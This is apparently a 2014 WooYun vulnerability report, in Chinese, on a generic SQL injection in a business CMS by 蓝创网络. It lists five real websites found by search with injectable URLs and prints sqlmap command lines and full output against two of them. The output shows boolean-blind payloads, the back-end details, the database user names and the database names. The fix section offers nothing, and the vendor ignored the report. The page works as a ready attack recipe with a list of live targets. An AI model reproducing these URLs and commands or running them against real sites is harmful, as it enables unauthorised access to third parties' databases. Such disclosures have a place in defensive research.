当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-064953

漏洞标题:某商务CMS通用型Sql注入漏洞

相关厂商:蓝创网络

漏洞作者: 泳少

提交时间:2014-06-16 11:42

修复时间:2014-06-21 11:42

公开时间:2014-06-21 11:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-06-16: 细节已通知厂商并且等待厂商处理中
1970-01-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
1970-02-25: 细节向核心白帽子及相关领域专家公开
1970-03-07: 细节向普通白帽子公开
1970-03-17: 细节向实习白帽子公开
2014-06-21: 细节向公众公开

简要描述:

RT///感谢神的指引!

详细说明:

关键字:技术支持:蓝创网络

1.png


然后。。我百度随便找了几个网站

2.png

3.png

4.png

5.png


我收集了几个网站:

http://www.filteco.com/news_s.asp?id=11%27
http://www.dctennis.cn/news_c.php?id=210%27
http://www.laoxiangren.cn/news_c.php?id=48&cf=news%27
http://www.vazbrand.com/product_detail.asp?id=1222%27
http://www.fsfhad.com/news_c.php?id=326%27


就几个哈!

漏洞证明:

然后利用sqlmap跑了两个网站的裤子

D:\sqlmap>sqlmap.py -u "http://www.dctennis.cn/news_c.php?id=210" --dbs --curren
t-user --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:51:35
[21:51:36] [INFO] using 'D:\sqlmap\output\www.dctennis.cn\session' as session fi
le
[21:51:36] [INFO] testing connection to the target url
[21:51:36] [INFO] testing if the url is stable, wait a few seconds
[21:51:38] [WARNING] url is not stable, sqlmap will base the page comparison on
a sequence matcher. If no dynamic nor injectable parameters are detected, or in
case of junk results, refer to user's manual paragraph 'Page comparison' and pro
vide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[21:51:49] [INFO] testing if GET parameter 'id' is dynamic
[21:51:49] [INFO] confirming that GET parameter 'id' is dynamic
[21:51:50] [INFO] GET parameter 'id' is dynamic
[21:51:50] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[21:51:50] [INFO] testing sql injection on GET parameter 'id'
[21:51:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:51:56] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[21:51:56] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:51:56] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:51:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[21:51:57] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[21:51:57] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:51:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:51:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:05] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:06] [INFO] testing 'Oracle AND time-based blind'
[21:52:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:06] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=210' AND 7877=7877 AND 'XUCC'='XUCC
---
[21:52:09] [INFO] testing MySQL
[21:52:09] [INFO] confirming MySQL
[21:52:10] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:10] [INFO] fetching current user
[21:52:10] [INFO] retrieved: sqPdctdddds<%
current user: 'sqPdctdddds<%'
[21:53:10] [INFO] fetching current database
[21:53:10] [INFO] retrieved: sq_dctennis
current database: 'sq_dctennis'
[21:54:14] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[21:54:14] [INFO] fetching database names
[21:54:14] [INFO] fetching number of databases
[21:54:14] [INFO] retrieved:
[21:54:14] [ERROR] unable to retrieve the number of databases
[21:54:14] [INFO] falling back to current database
[21:54:14] [INFO] fetching current database
available databases [1]:
[*] sq_dctennis
[21:54:14] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.
dctennis.cn'
[*] shutting down at: 21:54:14


D:\sqlmap>sqlmap.py -u "http://www.laoxiangren.cn/news_c.php?id=48&cf=news" --db
s --current-user --current-db
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:52:05
[21:52:06] [INFO] using 'D:\sqlmap\output\www.laoxiangren.cn\session' as session
file
[21:52:06] [INFO] testing connection to the target url
[21:52:08] [INFO] testing if the url is stable, wait a few seconds
[21:52:10] [INFO] url is stable
[21:52:10] [INFO] testing if GET parameter 'id' is dynamic
[21:52:10] [INFO] confirming that GET parameter 'id' is dynamic
[21:52:10] [INFO] GET parameter 'id' is dynamic
[21:52:10] [WARNING] heuristic test shows that GET parameter 'id' might not be i
njectable
[21:52:10] [INFO] testing sql injection on GET parameter 'id'
[21:52:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:52:12] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVI
NG clause' injectable
[21:52:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[21:52:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[21:52:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLT
ype)'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:52:13] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[21:52:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[21:52:13] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:52:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[21:52:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[21:52:18] [INFO] testing 'Oracle AND time-based blind'
[21:52:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:52:23] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:52:23] [WARNING] using unescaped version of the test because of zero knowled
ge of the back-end DBMS
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N]
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=48' AND 6123=6123 AND 'dGyf'='dGyf&cf=news
---
[21:52:24] [INFO] testing MySQL
[21:52:24] [INFO] confirming MySQL
[21:52:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL >= 5.0.2
[21:52:26] [INFO] fetching current user
[21:52:26] [INFO] retrieved: sqPddtxd2(1(<%
current user: 'sqPddtxd2(1(<%'
[21:53:09] [INFO] fetching current database
[21:53:09] [INFO] retrieved: sq_jhtxh2010
current database: 'sq_jhtxh2010'
[21:53:40] [WARNING] information_schema not available, back-end DBMS is MySQL <
5. database names will be fetched from 'mysql' database
[21:53:40] [INFO] fetching database names
[21:53:40] [INFO] fetching number of databases
[21:53:40] [INFO] retrieved:
[21:53:40] [ERROR] unable to retrieve the number of databases
[21:53:40] [INFO] falling back to current database
[21:53:40] [INFO] fetching current database
available databases [1]:
[*] sq_jhtxh2010
[21:53:40] [INFO] Fetched data logged to text files under 'D:\sqlmap\output\www.
laoxiangren.cn'
[*] shutting down at: 21:53:40

修复方案:

你懂的

版权声明:转载请注明来源 泳少@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-06-21 11:42

厂商回复:

最新状态:

暂无